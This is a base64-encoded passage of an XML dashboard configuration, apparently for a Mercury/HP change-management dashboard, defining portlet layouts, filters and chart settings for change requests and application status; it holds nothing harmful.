1dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5DaGFuZ2VzIE92ZXIgVGltZTwvdGl0bGU+PHBvcnRsZXREZWZpbml0aW9uVXVpZD4zMjljODEyYzUxNzgzZTllOjZhOTUyMGYzOjExNjM5ODE3ZGEyOi03ZmVjPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5wb3J0bGV0RWRpdGVkPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPkZpbHRlcjwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bMjk0OTEyXVtBbnldPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W3dlZWtdW1dlZWtdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+Y29tLm1lcmN1cnkuZGFzaGJvYXJkLmFwcC5wb3J0YWwuaXNXaWRlUG9ydGxldDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT50cnVlPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48aXNNaW5pbWl6ZWQ+ZmFsc2U8L2lzTWluaW1pemVkPjxpc1BvcnRsZXRDb21tPmZhbHNlPC9pc1BvcnRsZXRDb21tPjwvcG9ydGxldD48YXV0b1JlZnJlc2g+ZmFsc2U8L2F1dG9SZWZyZXNoPjxyZWZyZXNoSW50ZXJ2YWw+MDwvcmVmcmVzaEludGVydmFsPjwvcGFnZT48cGFnZT48cGFnZVNlcXVlbmNlPjE8L3BhZ2VTZXF1ZW5jZT48dGl0bGU+QW5hbHlzaXM8L3RpdGxlPjxwb3J0bGV0Pjx0aXRsZT5BcHBsaWNhdGlvbiBTZXZlcml0eSBEaXN0cmlidXRpb248L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTgwMDA8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W1BFTkRJTkdfQVBQUk9WQUxdW1BlbmRpbmcKCQkJCQkJCUFwcHJvdmFsXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlVzZXIgQXBwbGljYXRpb25zPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltZXVtZZXNdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+Y29tLm1lcmN1cnkuZGFzaGJvYXJkLmFwcC5wb3J0YWwuaXNXaWRlUG9ydGxldDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT50cnVlPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48aXNNaW5pbWl6ZWQ+ZmFsc2U8L2lzTWluaW1pemVkPjxpc1BvcnRsZXRDb21tPmZhbHNlPC9pc1BvcnRsZXRDb21tPjwvcG9ydGxldD48cG9ydGxldD48dGl0bGU+Q2hhbmdlIFJlcXVlc3QgSW1wYWN0IEFuYWx5c2lzIFJhdGlvPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZlPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlJlcXVlc3QgU3RhdHVzPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4yPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5BcHBsaWNhdGlvbiBTdGF0dXMgRGlzdHJpYnV0aW9uPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZmPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlVzZXIgQXBwbGljYXRpb25zPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltZXVtZZXNdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+VGltZSBGcmFtZTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bTGFzdCBNb250aF1bTGFzdCBNb250aF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4xPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0PjxhdXRvUmVmcmVzaD5mYWxzZTwvYXV0b1JlZnJlc2g+PHJlZnJlc2hJbnRlcnZhbD4wPC9yZWZyZXNoSW50ZXJ2YWw+PC9wYWdlPjxwYWdlPjxwYWdlU2VxdWVuY2U+MjwvcGFnZVNlcXVlbmNlPjx0aXRsZT5Qb3N0IEltcGxlbWVudGF0aW9uPC90aXRsZT48cG9ydGxldD48dGl0bGU+T3V0Y29tZSBPdmVyIFRpbWU8L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+NmEzNjczYzlmZWI3NmRjYjotMzYyNTYxNjY6MTE3MmIyOTE1YTI6LTdmZjQ8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPnBvcnRsZXRFZGl0ZWQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+RmlsdGVyPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsyOTQ5MjBdW0Nsb3NlZF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bd2Vla11bV2Vla108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5PdXRjb21lIEdyb3VwZWQgQnkgUmlzazwvdGl0bGU+PHBvcnRsZXREZWZpbml0aW9uVXVpZD42YTM2NzNjOWZlYjc2ZGNiOi01MTk3MDhjYzoxMTcyYmE1NzllZDotN2ZmMTwvcG9ydGxldERlZmluaXRpb25VdWlkPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+cG9ydGxldEVkaXRlZDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+ZGlzcGxheVByZWZTdW1tYXJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5GaWx0ZXI8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzI5NDkyMF1bQ2xvc2VkXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPk1pbmltdW4gVmFsdWU8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5JbnRlcnZhbDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bMTBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5NYXhpbXVtIFZhbHVlPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsxMDBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5OdW1lcmljIFR5cGU8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W2NhbGN1bGF0ZWQtcmlza11bY2FsY3VsYXRlZC1yaXNrXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmNvbS5tZXJjdXJ5LmRhc2hib2FyZC5hcHAucG9ydGFsLmlzV2lkZVBvcnRsZXQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+dHJ1ZTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0Um93PjE8L2xheW91dFJvdz48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGlzTWluaW1pemVkPmZhbHNlPC9pc01pbmltaXplZD48aXNQb3J0bGV0Q29tbT5mYWxzZTwvaXNQb3J0bGV0Q29tbT48L3BvcnRsZXQ+PGF1dG9SZWZyZXNoPmZhbHNlPC9hdXRvUmVmcmVzaD48cmVmcmVzaEludGVydmFsPjA8L3JlZnJlc2hJbnRlcnZhbD48L3BhZ2U+PC9Nb2R1bGU+PFBvcnRsZXREZWZpbml0aW9uPjxCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjxDaGFydFBvcnRsZXREZWZpbml0aW9uPjxCdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGRhdGFTb3VyY2U+PGlkPkNIQU5HRV9JTVBBQ1RfQU5BTFlTSVNfUkFUSU88L2lkPjxuYW1lPkNoYW5nZSBSZXF1ZXN0IEltcGFjdCBBbmFseXNpcyBSYXRpbzwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5SZXF1ZXN0IFN0YXR1czwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+ZGVmd2FmZHNhZmRzYTwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2U+U3RhdHVzIENvbG9yPC9jb2xvclNvdXJjZT48dG9vbHRpcFNvdXJjZT4jIFJlcXVlc3RzPC90b29sdGlwU291cmNlPjx0b29sdGlwQ29udGFpbnNIVE1MPmZhbHNlPC90b29sdGlwQ29udGFpbnNIVE1MPjxvcmllbnRhdGlvbj52ZXJ0aWNhbDwvb3JpZW50YXRpb24+PGh5cGVybGluaz48aHlwZXJsaW5rVHlwZT5ub0h5cGVybGluazwvaHlwZXJsaW5rVHlwZT48aHlwZXJsaW5rU291cmNlLz48L2h5cGVybGluaz48L0NoYXJ0UG9ydGxldERlZmluaXRpb24+PGJhck5hbWVTb3VyY2U+U3RhdHVzPC9iYXJOYW1lU291cmNlPjxiYXJBeGlzTGFiZWw+U3RhdHVzPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48L0JhckNoYXJ0UG9ydGxldERlZmluaXRpb24+PHR5cGU+QmFyQ2hhcnQ8L3R5cGU+PG5hbWU+Q2hhbmdlIFJlcXVlc3QgSW1wYWN0IEFuYWx5c2lzIFJhdGlvPC9uYW1lPjx1dWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZlPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPnRydWU8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PENoYXJ0UG9ydGxldERlZmluaXRpb24+PEJ1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48ZGF0YVNvdXJjZT48aWQ+Q0hBTkdFX09WRVJfVElNRV9EQVRBX1NPVVJDRTwvaWQ+PG5hbWU+Q2hhbmdlcyBPdmVyIFRpbWU8L25hbWU+PC9kYXRhU291cmNlPjxwcmVmZXJlbmNlU3VtbWFyeVNob3duPnRydWU8L3ByZWZlcmVuY2VTdW1tYXJ5U2hvd24+PHJlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PmZhbHNlPC9yZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz48aGVscFRleHQvPjxwcmVmZXJlbmNlPjxuYW1lPkZpbHRlcjwvbmFtZT48dHlwZT5kcm9wZG93bjwvdHlwZT48cHJvbXB0PkZpbHRlcjo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZS8+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjxwcmVmZXJlbmNlPjxuYW1lPkdyb3VwIEJ5PC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+R3JvdXAgQnk6PC9wcm9tcHQ+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4xPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjE8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWU+W3dlZWtdW1dlZWtdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjwvQnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxjaGFydFRpdGxlPkNoYW5nZXMgT3ZlciBUaW1lPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZS8+PHRvb2x0aXBTb3VyY2U+Q291bnQ8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+Q291bnQ8L3lBeGlzU291cmNlPjx5QXhpc0xhYmVsPkNvdW50PC95QXhpc0xhYmVsPjxzZXJpZXNTb3VyY2U+TGluZSBMYWJlbDwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5DaGFuZ2VzPC9zZXJpZXNMYWJlbD48L0xpbmVDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkxpbmVDaGFydDwvdHlwZT48bmFtZT5DaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48dXVpZD4zMjljODEyYzUxNzgzZTllOjZhOTUyMGYzOjExNjM5ODE3ZGEyOi03ZmVjPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPmZhbHNlPC9leHBvcnRBc1dTUlA+PHN1cHBvcnREcmlsbFRvPnRydWU8L3N1cHBvcnREcmlsbFRvPjxwb3J0bGV0Q29tbVN1cD5mYWxzZTwvcG9ydGxldENvbW1TdXA+PGJ1aWx0SW4+ZmFsc2U8L2J1aWx0SW4+PGRlcGVuZGVudFV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmM8L2RlcGVuZGVudFV1aWQ+PC9Qb3J0bGV0RGVmaW5pdGlvbj48UG9ydGxldERlZmluaXRpb24+PE11bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BUFBMSUNBVElPTl9TVEFUVVNfRElTVFJJQlVUSU9OPC9pZD48bmFtZT5CdXNpbmVzcyBDSSBTdGF0dXMgRGlzdHJpYnV0aW9uPC9uYW1lPjwvZGF0YVNvdXJjZT48cHJlZmVyZW5jZVN1bW1hcnlTaG93bj50cnVlPC9wcmVmZXJlbmNlU3VtbWFyeVNob3duPjxyZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz5mYWxzZTwvcmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+PGhlbHBUZXh0Lz48cHJlZmVyZW5jZT48bmFtZT5Vc2VyIEFwcGxpY2F0aW9uczwvbmFtZT48dHlwZT55ZXNObzwvdHlwZT48cHJvbXB0PlNob3cgT25seSBVc2VyIEFwcGxpY2F0aW9uczwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MTwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltZXVtZZXNdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+ZWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5UaW1lIEZyYW1lPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+Q3JlYXRlZCBXaXRoaW48L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bTGFzdCBNb250aF1bTGFzdCBNb250aF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QXBwbGljYXRpb24gU3RhdHVzIERpc3RyaWJ1dGlvbjwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2UvPjx0b29sdGlwU291cmNlPiMgUmVxdWVzdHM8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uPnZlcnRpY2FsPC9vcmllbnRhdGlvbj48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48YmFyTmFtZVNvdXJjZT5JbXBhY3RlZCBBcHBsaWNhdGlvbjwvYmFyTmFtZVNvdXJjZT48YmFyQXhpc0xhYmVsPkltcGFjdGVkIEFwcGxpY2F0aW9uPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48c2VyaWVzU291cmNlPlN0YXR1czwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5TdGF0dXM8L3Nlcmllc0xhYmVsPjwvTXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkNsdXN0ZXJlZEJhckNoYXJ0PC90eXBlPjxuYW1lPkFwcGxpY2F0aW9uIFN0YXR1cyBEaXN0cmlidXRpb248L25hbWU+PHV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmY8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjI8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+dHJ1ZTwvZXhwb3J0QXNXU1JQPjxzdXBwb3J0RHJpbGxUbz50cnVlPC9zdXBwb3J0RHJpbGxUbz48cG9ydGxldENvbW1TdXA+ZmFsc2U8L3BvcnRsZXRDb21tU3VwPjxidWlsdEluPmZhbHNlPC9idWlsdEluPjxkZXBlbmRlbnRVdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC9kZXBlbmRlbnRVdWlkPjwvUG9ydGxldERlZmluaXRpb24+PFBvcnRsZXREZWZpbml0aW9uPjxMaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5DSEFOR0VfT1ZFUl9USU1FX0RBVEFfU09VUkNFPC9pZD48bmFtZT5DaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ